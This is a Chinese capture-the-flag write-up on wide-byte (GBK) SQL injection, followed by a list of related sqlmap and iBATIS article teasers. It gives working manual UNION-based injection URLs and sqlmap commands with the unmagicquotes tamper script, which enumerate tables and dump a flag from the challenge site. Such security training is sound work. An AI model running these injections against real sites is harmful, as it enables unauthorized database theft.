(宽字节注入) 手注+sqlmap

明月清风精进不止 2019-10-23

进入题目后先简单尝试一下。

(宽字节注入) 手注+sqlmap

很明显的宽字节注入。

宽字节注入就是用一个大于128的十六进制数来吃掉转义符\,gbk编码,字节作为一个字符的编码.

手工注入
1、判断列数:
http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df%27 order by 1%23
http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df%27 order by 2%23
http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df%27 order by 3%23
order by 3 时报错,说明只有两列。

2、各类信息:
http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df%27 and 1=2
union select 2,(concat_ws(char(32,58,32),user(),database(),version()))%23
: sae-chinalover : 5.5.52-0ubuntu0.14.04.1

3、库名:
http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df%27 and 1=2 union select 2,database()%23
sae-chinalover

4、表名:
http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df%27 and 1=2
union select 2,group_concat(table_name)
from information_schema.tables
where table_schema=database()%23
ctf,ctf2,ctf3,ctf4,news

5、ctf4表的列名:
http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df%27 and 1=2
union select 2,group_concat(column_name)
from information_schema.columns
where table_name=0x63746634%23
id,flag

这里注意:要将表名ctf4转为16进制

这里提供一个字符串转16进制的网站:

http://www.5ixuexiwang.com/str/hex.php

转了16进制之后记得在前面加上0x

6、flag列的数据:
http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df%27 and 1=2
union select 2,(select flag from ctf4)%23
flag{this_is_sqli_flag}

sqlmap跑法
1、查看有哪些库:
sqlmap.py -u "http://chinalover.sinaapp.com/SQL-GBK/index.php?id=3" --tamper unmagicquotes --dbs
这个时侯就要用到一个脚本了:

脚本名:unmagicquotes.py

作用:宽字符绕过

(宽字节注入) 手注+sqlmap

2、表名:

sqlmap.py -u "http://chinalover.sinaapp.com/SQL-GBK/index.php?id=3" --tamper unmagicquotes -D `sae-chinalover` --tables

3、列名:

sqlmap.py -u "http://chinalover.sinaapp.com/SQL-GBK/index.php?id=3" --tamper unmagicquotes -D `sae-chinalover` -T ctf4 --columns

 (宽字节注入) 手注+sqlmap

4、flag列的数据:
sqlmap.py -u "http://chinalover.sinaapp.com/SQL-GBK/index.php?id=3" --tamper unmagicquotes -D `sae-chinalover` -T ctf4 -C flag

(宽字节注入) 手注+sqlmap

明月清风精进不止

明月清风精进不止

相关推荐

sqlmap从入门到精通-第四章-4-8 sqlmap数据库拖库攻击与防范

原因是由于早年间多家媒体报道多家互联网网站数据库被公开下载,后制作社工库,用来查询公开的个人信息所致。 对账户进行身份和地域信息分类,将这些信息卖给需要的公司,公司通过精准的销售,营销手段获利,例如:卖楼,炒股,贷款。所以大家接到各种骚扰电话其原因之一就是

zyjj / 0评论 2020-07-04

sqlmap从入门到精通-第四章-4-2 SQL Server获取webshell及提权基础

主要架构ASP+MSSQL+IIS或者ASP.NET+MSSQL+IIS ,PHP和JSP架构也是支持MSSQL. 通过翻查conn.aspx, config.aspx, conn.asp, config.asp, config.php, web.conf

bluet00 / 0评论 2020-06-25

第三天--注入攻击:Web安全之SQL注入漏洞专题

第三天--注入攻击:Web安全之SQL注入漏洞专题。SQL手工注入上节课就讲过了,简单复习下。使用union联合查询数据库,数据表,字段以及字段信息。Sqlmap.py –u URL –p 具体参数。结合Burpsuite读取日志文件。Burp提取HTTP

godfather / 0评论 2020-06-13

SQLMAP 弹二 传入数据全局使用

一开始研究了一会儿的数据跳着传递,后来发现sqlmap本身的conf是一个全局实例,在开始的时候进行初始化,在之后的各个流程中都有引用。所以集群名或者其他数据可以通过参数的形式传入conf配置里,再在其他地方调用。] to see full list of

lt云飞扬gt / 0评论 2020-06-09

DVWA+SQLMAP

最近在做一个DVWA本地***测试的一个演练,其中遇到的一些问题做一个记录。附上sqlmap执行语句。

tanrong / 0评论 2020-06-03

sqlmap和手注

如果上面无效时,可以试试添加--data="name=value"来指定传参进行测试注入。-- 在SQL内表示注释,但在URL中,浏览器在发送请求的时候会把URL末尾的空格舍去,变成--,所以我们用--+代替-- ,原因是+在被URL编

旗木卡卡西 / 0评论 2020-06-02

sqlmap过狗脚本练习1

本地搭建sql注入网站练习。测试安全狗,输入不合法参数被安全狗拦截:。检测到防护机制,失败;将空格替换为 “/*//\*//\*\/c*/” 成功绕过安全狗;if i =="‘" and i==‘"‘:. 加上脚本继续跑:。(

徐悦TechBlog / 0评论 2020-05-27

sqlmap基本使用

    Microsoft Access、IBM DB2、SQLite、Firebird、Sybase、SAP MaxDB.   基于时间的盲注:即根据页面返回的内容判断任何信息,要利用条件语句查询时间延迟语句是否执行来判断。    或者抓包之后将请求头放

liuyang000 / 0评论 2020-03-05

Pikahu-SQL注入模块和sqlmap经典用法

sql注入漏洞 危害是最大得。sql注入类型: 数字型 user_id=$id.        搜索型 text like ‘%{$_GET[‘search‘]}‘ ". select 字段1 from table where id=1 会显示表

xuanlvhaoshao / 0评论 2020-02-21

sqlmap常用命令

--------------------------------------------------------------------------------------------------------------------------------

ItBJLan / 0评论 2020-02-20

登陆页面Sql注入(绕过)

到这里我就基本上没辙了,不过查询了资料以后发现sqlmap可以对登录页面进行注入。“sqlmap的爬虫会爬取自定义的深度以及寻找form表单并自动填充缺失的数据加入扫描”,换句话说sqlmap可以对登陆页面进行注入,并且它会自动寻找注入框来填充数据测试sq

tanrong / 0评论 2020-02-15

sqlmap在https情况下的一个错误

对于https网站,使用sqlmap可能会出现如下错误。// curl_setopt; // post 提交方式

PinkBean / 0评论 2020-02-12

DVWA靶机-sql自动注入

打开sql漏洞,发现输入不同的数字会返回不同的信息,前面一个单引号闭合了查询语句自带的第一个单引号,or 1=1 使得结果永远为真,sqlmap需要python环境才能运行。这里先别急着粘贴url,因为登陆dvwa靶机需要用户名和密码,所以会有cookie

gwn00 / 0评论 2020-02-01

3_SQL注入攻击_3_SQLmap自动化注入攻击

  SQL注入比较好的工具,首推开源工具SQLmap。SQLmap是一款国内外著名的安全测试工具;  可以用来进行自动化检测;  利用SQL注入漏洞,获取数据库服务器的权限;  包含获取数据库中的存储的数据,包含操作系统的中的文件,甚至可以通过外带数据连接

一对儿程序猿 / 0评论 2020-01-18

利用sqlmap进行POST注入

sqlmap.py -r "c:\Users\fendo\Desktop\post.txt" -p n --dbs注:-r表示加载一个文件,-p指定参数。it looks like the back-end DBMS is ‘MySQL

xuanlvhaoshao / 0评论 2020-01-02

SQLMap使用

sqlmap是一款SQL注入漏洞测试工具,支持MySQL, Oracle,PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird,Sybase和SAP Ma

gwn00 / 0评论 2020-01-09

在windows系统和kali中通过sqlmap注入

Sqlmap是目前功能最强大,使用最为广泛的注入类工具,是一个开源软件,被集成于kaliLinux,由于sqlmap是基于Python编写,所以需要在系统中先安装好2.7.x版本的Python,然后将下载好的sqlmap放在Python2.7目录下,这里P

tanrong / 0评论 2019-12-22

sqlmap tamper脚本扩展开发(Bypass IPS)

首先先对比一下两个自带的tamper脚本,看看sqlmap调用tamper有没有依赖什么类库或者算法.例如调用tamper是导入之后调用脚本里的某函数,那么我们开发的tamper脚本也应该有调用要用到的函数,主要看算法吧,咳咳。* Useful to by

tanrong / 0评论 2019-12-16

sql注入原理

select * from admin where username = ‘用户输入的用户名‘ and password =用户输入的密码‘。sqlmap -u "192. 168.1.104 : 8081/ cms/articles. php?

一对儿程序猿 / 0评论 2019-11-10

Nmap、Sqlmap等工具使用

-u 指定注入点url-r 指定request?--dbs 暴库--tables 列出表--columns 列出字段--dump 下载数据--beach 程序自动输入询问语句的[Y/N]--current-db web当前使用的数据库--start 指定开

YFCEMBEDD / 0评论 2019-11-09

SQL注入之sqlmap进阶

上一篇我们对sqlmap进行简单的介绍,并介绍了一些·sqlmap的基础用法,这篇让我们来更深入的了解一下sqlmap,了解一下它的强大功能。在sqlmap中一共有五个探测等级,默认等级为一。等级为二时会测试HTTP头的cookie注入。等级为三时会测试H

一对儿程序猿 / 0评论 2019-11-06

Sqlmap常用命令

sqlmap常用命令总结:注意:命令为kali linux中运行的 . 1#、注入六连:1. sqlmap -u "http://www.xx.com?id=x" 【查询是否存在注入点。3#、POST注入:目标地址http:// www

明月清风精进不止 / 0评论 2019-10-28

X-forwarded-for注入漏洞实战

2:#sqlmap -r 1.txt --current-db --batch //爆出数据库3:#sqlmap -r 1.txt -D webcalendar --tables //爆出表4:#sqlmap -r 1.txt -D webcale

ALiDan / 0评论 2019-10-21

sqlmap 常用参数

-p#指定可测试的参数(?-s“”#保存注入过程到一个文件,还可中断,下次恢复在注入。–dump-T“”-D“”-C“”#列出指定数据库的表的字段的数据。–method“POST”–data“”#POST方式提交数据

cenhui / 0评论 2013-02-20

mybatis3.2.2 sqlmap通配实现

比如这个会扫描所有cn/com/xxxx/**/sqlmap_*_yw.xml这种格式的sqlmap.xml. 本来想通过spring的aop实现,不过没成,于是我只能修改源码了。如果有更好的方案的朋友可以告诉我,谢谢。但是由于是private方法,所以我

gwn00 / 0评论 2013-08-06

Abator自动生成DAO,DTO和sqlMap的使用方法

Abator能自动生成DAO,DTO和sqlMap,大大提高开发效率。Abator是一款iBATIS代码生成工具。它从数据库获取信息,然后产生如下文件。1)数据库表的SqlMap.xmlfile文件,如UserSQL.xml;3)包含一个综合主键的数据库表

qshpeng / 0评论 2013-02-18

iBatis初级入门

DOCTYPE sqlMapConfig PUBLIC "-//iBATIS.com//DTD SQL Map Config 2.0//EN". -- 加载JDBC配置文件 -->. -- 设置连接属性 -->. -- 引入

qshpeng / 0评论 2013-01-22

iBATIS中statement ID命名冲突

在用iBaTIS开发软件时,需要写很多sqlmapXML文件,尤其是多人开发时候,这样就会造成statement中的id会发生命名冲突,方法1:通过命名规范,确保所有的id必须不一样,这样会麻烦,特别是当系统整合时候出现该问题,更是头疼,此方法不可取。方法

gwn00 / 0评论 2012-08-14

Ibatis核心、映射 配置文件

-- Use type aliases to avoid typing the full classname every time. --><!

qshpeng / 0评论 2012-05-28

ibatis 缓存技术 转载

最近开始重构公司一套手机论坛系统。原系统存在架构层次不清晰,访问速度慢的问题。其使用的OR映射框架是Hibernate,鉴于Hibernate的一些不满足需要情况下,我们在重构的时候换成了iBatis,为了加快访问速度,采用了iBatis的缓存技术。iBa

watertone / 0评论 2011-12-26

iBATIS缓存的使用方法--摘自iBATIS官方文档

iBATIS可以在MappedStatement中使用缓存模型,在内存中缓存常用的数据。每一个查询mappedstatement可以使用不同或相同的cacheModel。以下给出个例子:。CacheModel使用插件方式来支持不同的缓存算法。MEMORYc

dropkai / 0评论 2011-09-21

Ibatis动态传入连接数据库时的参数信息

driver_name是要传递的新的数据库连接串的驱动,其它的类似。此时的sqlMap获得的是自己动态传入的数据库信息,而不是配置文件中的信息,就可以利用这个sqlMap进行对数据库操作了。

frank0 / 0评论 2011-06-10

ibatis缓存

最近开始重构公司一套手机论坛系统。原系统存在架构层次不清晰,访问速度慢的问题。其使用的OR映射框架是Hibernate,鉴于Hibernate的一些不满足需要情况下,我们在重构的时候换成了iBatis,为了加快访问速度,采用了iBatis的缓存技术。iBa

dropkai / 0评论 2011-05-18

ibatis可配置数据库设计

3:在sql-map-config.xml中配置如下

shouen / 0评论 2011-04-21

ibatis sqlMap.xml 文件 like 查询的三种方案

select * from student where name like '%'||#name#||'%'

phpchandler / 0评论 2011-04-20

spring+ibatis整合方法

2、ibatis配置文件sqlmap-config.xml中引入具体的ibatis配置文件即可

mengsun / 0评论 2011-04-20

Ibatis写CLOB数据

Ibatis是一个高效,方便,易于学习的数据访问组件,在性能上比hibernate高,学习难度也比hibernate和jdo要低,而且它比直接使用jdbc方便和易于维护。所以Ibatis深入大家的喜爱,一些对性能有更高的要求的系统,或改造遗留系统时,Iba

mengsun / 0评论 2011-04-18

spring ibatis

</sqlMapConfig>但是启动的时候还是会报一个异常,SqlMapConfig.xml中必须满足

qshpeng / 0评论 2011-03-12

Data truncation: Data truncated for column异常的解决

从excel读取数据插入mysql库中,莫名其妙地少数几条记录的中文字段用程序插入不了,而用客户端写sql可以成功,用肉眼看没发现那几条记录数据有什么异常。

qshpeng / 0评论 2011-02-14

There is no statement named xxx in this SqlMap 让我很莫名

我已经在Control.xml里加了Control.insert-control,问题依然在。最后查找之下,原来在SqlMapConfig.xml里没有加上

mengsun / 0评论 2011-02-12

ibatis缓存

最近开始重构公司一套手机论坛系统。原系统存在架构层次不清晰,访问速度慢的问题。其使用的OR映射框架是Hibernate,鉴于Hibernate的一些不满足需要情况下,我们在重构的时候换成了iBatis,为了加快访问速度,采用了iBatis的缓存技术。iBa

希望能帮助到你 / 0评论 2011-01-25

SqlMapConfigParser

importjava.io.*;addSqlMapNodelets();if(props!=null). returnparse(reader);usingStreams=false;parser.parse(reader);if(props!=null)

mengsun / 0评论 2011-01-14

ibatis sqlmap

<resultMapid="result1"class="message"extends="MessageInfo">. <selectid="getMessageBy

gwn00 / 0评论 2010-12-30

ibatis sqlmap中"$"和"#"的区别

#a#//解析sqlmap配置文件时自动加单引号,即'a'. 如果传进来的条件需要orderby的话,那一定用第二种

qshpeng / 0评论 2010-12-29

cache介绍及应用

ibatis目前提供了LRU,MEMORY,FIFO,OSCACHE这四种.当Cache达到预先设定的最大容量时,ibatis会按照“最少使用”原则将使用频率最少的对象从缓冲中清除。如果系统需要部署在集群中,或者需要部署在多机负载均衡模式的环境中以获得性能

zjyzz / 0评论 2010-11-17

配置文件

<?xml version="1.0" encoding="UTF-8"?>. <!DOCTYPE sqlMap. <select id="selectCountClass"

zjyzz / 0评论 2010-11-09

SqlMapClient基本操作示例

摘自ibatis官方开发手册,笔者对其进行了重新排版以获得更好的阅读效果。Map map = sqlMap.queryForMap (“getProductList”, null,

伊恩 / 0评论 2014-03-18

ibatis入门实例讲解

首先呢,打开资源包,可以看到里面有一个simple_exzample的文件夹,在MyEclipse8.5中新建一个JAVA项目,将刚才的文件夹中内容复制到项目SRC下,这样的话呢,可以看到这样一个目录。-- Configure a built-in tra

zjyzz / 0评论 2010-10-25

ibatis实践

-- 加载属性文件-->. </sqlMapConfig>2.属性文件sqlMap.properties是配置数据库的文件,其代码如下:。password=crws3.sqlMap文件Student.xml是具体的sql语句,其代码如下:

rumengqiang / 0评论 2010-10-05